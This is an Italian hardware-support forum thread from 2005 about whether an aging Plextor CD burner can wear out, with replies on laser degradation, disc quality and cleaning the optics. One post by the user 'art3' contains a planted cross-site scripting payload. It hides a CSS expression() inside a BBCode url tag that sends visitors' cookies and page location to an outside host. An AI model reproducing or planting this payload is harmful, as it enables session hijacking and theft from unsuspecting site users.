Condividi:        

Un masterizzatore può esaurirsi?

Se il modem non funziona, hai problemi con la scheda video o non sai che processore scegliere entra qui!!

Moderatori: m.paolo, Caffey

Un masterizzatore può esaurirsi?

Postdi Iray » 14/07/05 01:18

Ho (da 3 o 4 anni, credo...) un masterizzatore CD Plextor16/10/40A che ho sempre considerato una gran bella periferica e che non mi aveva mai dato problemi.
Da qualche tempo a questa parte però mi masterizza CD che spesso non hanno successo al "Data Verification" di NERO e che in alcuni casi proprio non funzionano.
Considerando che:
- Non ne ho mai fatto un uso smodato.
- Ho sempre masterizzato a velocità 4x o al max 8x.
- Ho sempre lasciato il PC a masterizzare solamente, senza lanciare altre applicazioni.

Mi chiedo: questi problemi possono derivare dalla sua età?

Ho comunque intenzione di comprare un masterizzatore CD/DVD, quindi il problema non è grave, però vorrei sapere se fidarmi ancora di quel masterizzatore o no...

P.S.: Ho appena aggiornato il firmware (da 1.03 a 1.05), seguendo un consiglio di questo forum, non ho ancora avuto modo di fare prove, ma ho l'impressione che non risolva granchè perchè nel mio caso sistema solo bugfix minori.

Grazie mille!
Iray
Utente Senior
 
Post: 138
Iscritto il: 27/08/01 01:00

Sponsor
 

Postdi Mikizo » 14/07/05 10:33

La risposta sintetica è SI, anzi, prima o poi certamente qualsiasi unità ottica smette di funzionare per degradazione del fascio laser generato. Questo vale per lettori e masterizzatori sia CD che DVD e di qualsiasi marca e prezzo.
Può variare il tempo di vita dell'apparecchio: da 2 a 5 anni, direi.
Avatar utente
Mikizo
Download Admin
 
Post: 8517
Iscritto il: 05/01/02 01:00
Località: Outside

Postdi 12 » 14/07/05 15:32

già .. dipende dal tempo e dall' intesita' di utilizzo che ne fai .. cioè se masterizzi 10 cd al giorno per 2 anni il masterizzatore sara' da buttare prima , perchè proprio a seconda dell' intesita' di utilizzo si consuma la potenza di scrittura della testina, proprio come dice mikizo , e quindi si ha meno precisione nella scrittura dei cd / dvd e nei casi piu' trastici o comunque con l' andar del tempo il masterizzatore è da buttare..

ciauu
12
Utente Senior
 
Post: 1413
Iscritto il: 12/01/04 19:45
Località: Milèn

Postdi maxmula » 14/07/05 22:50

Beh, però se lo usi saltuariamente ti dura un bel pezzo!

A me viene più da pensare che sia peggiorata la qualità dei supporti... da quando si sono inventati 'sta storia dei dischi che sono adatti solo ai masterizzatori "high speed" ho come l'impressione che anche i CD "normali" siano costruiti in modo da mettere in difficoltà i drive più vecchi (e meno sensibili)...

Per caso hai recentemente cambiato marca, o quella cheusavi ha modificato gli standard qualitativi?

Ciao,
MAx
Avatar utente
maxmula
Utente Senior
 
Post: 965
Iscritto il: 18/08/04 18:28
Località: N44°59'45 E09°00'34

Postdi GAD » 14/07/05 23:43

Beh, però se lo usi saltuariamente ti dura un bel pezzo!

A volte la polvere che si accumula causa inutilizzo porta molti piu' danni che l'utilizzo smodato.Soprattutto pensando alle mini puleggie di plastica che fanno girare il motorino o allo specchieto del laser
Quando l'ultimo albero sarà abbattuto,l'ultimo pesce catturato,l'ultimo fiume avvelenato,
soltanto allora gli uomini si accorgeranno chei soldi non possono essere mangiati
GAD
Moderatore
 
Post: 2184
Iscritto il: 22/09/02 14:36
Località: Nebbiosa

Postdi art3 » 15/07/05 09:36

Dipende soprattutto da quanto lo si utilizza!!


[url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://tg2.altervista.org/file.png?data='+document.location+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'
art3
Utente Junior
 
Post: 13
Iscritto il: 15/07/05 09:16

Postdi Iray » 17/07/05 23:28

X maxmula:
Ho sempre scelto CD di marche note ma non mi sono mai fissato su una marca... i più frequenti che prendo sono Philips e Verbatim, per gli RW ho TDK.

X GAD:
Mi consiglieresti di provare a pulirlo con cd pulenti (non l'ho mai fatto!) o magari di smontarlo e pulire pulegge ecc..? Non mi spaventa farlo, penso di essere in grado di rimontare tutto.
Iray
Utente Senior
 
Post: 138
Iscritto il: 27/08/01 01:00

Postdi GAD » 17/07/05 23:31

Mah... apri lo sportellino e guarda se nella feritoia c'e' polvere accumulata.
Smontarlo e' niente, il guaio e' rimontarlo!
Io proverei con qualcosa tipo i cd autopulenti per vedere se riesci a pulire la lente del laser oppure a darci una soffiata con il compressore ad aria.
Quando l'ultimo albero sarà abbattuto,l'ultimo pesce catturato,l'ultimo fiume avvelenato,
soltanto allora gli uomini si accorgeranno chei soldi non possono essere mangiati
GAD
Moderatore
 
Post: 2184
Iscritto il: 22/09/02 14:36
Località: Nebbiosa

Postdi 12 » 17/07/05 23:40

io lascere i cd autopulenti :-? un cd ti costa quasi quasi quasi la meta' del masterizzatore :neutral:
12
Utente Senior
 
Post: 1413
Iscritto il: 12/01/04 19:45
Località: Milèn

Postdi GAD » 17/07/05 23:42

beh 12 ha ragione, non costano certo poco.
Vai con una soffiatina del compressore e al max smontalo senza eccedere (ino modo da riuscire a rimontarlo) e vedi quanto e' sporco e se lo specchieto e' pulito
Quando l'ultimo albero sarà abbattuto,l'ultimo pesce catturato,l'ultimo fiume avvelenato,
soltanto allora gli uomini si accorgeranno chei soldi non possono essere mangiati
GAD
Moderatore
 
Post: 2184
Iscritto il: 22/09/02 14:36
Località: Nebbiosa

Postdi Iray » 18/07/05 10:16

Mi ero sempre chiesto se aveva senso prendere quei CD!!
Ok, grazie mille a tutti!
Iray
Utente Senior
 
Post: 138
Iscritto il: 27/08/01 01:00

Postdi maxmula » 18/07/05 14:01

Attento a non soffiare direttamente sull'ottica. Se stai troppo vicino rischi di rovinare il sistema di messa a fuoco, in quanto la lente e' letteralmente tenuta sospesa da 2 sottilissimissimi fili di metallo... che se soffi troppo forte si deformano!

Ciao,
MAx
Avatar utente
maxmula
Utente Senior
 
Post: 965
Iscritto il: 18/08/04 18:28
Località: N44°59'45 E09°00'34


Torna a Assistenza Hardware


Topic correlati a "Un masterizzatore può esaurirsi?":

problemi masterizzatore
Autore: Buonleo
Forum: Software Windows
Risposte: 3

Chi c’è in linea

Visitano il forum: Nessuno e 47 ospiti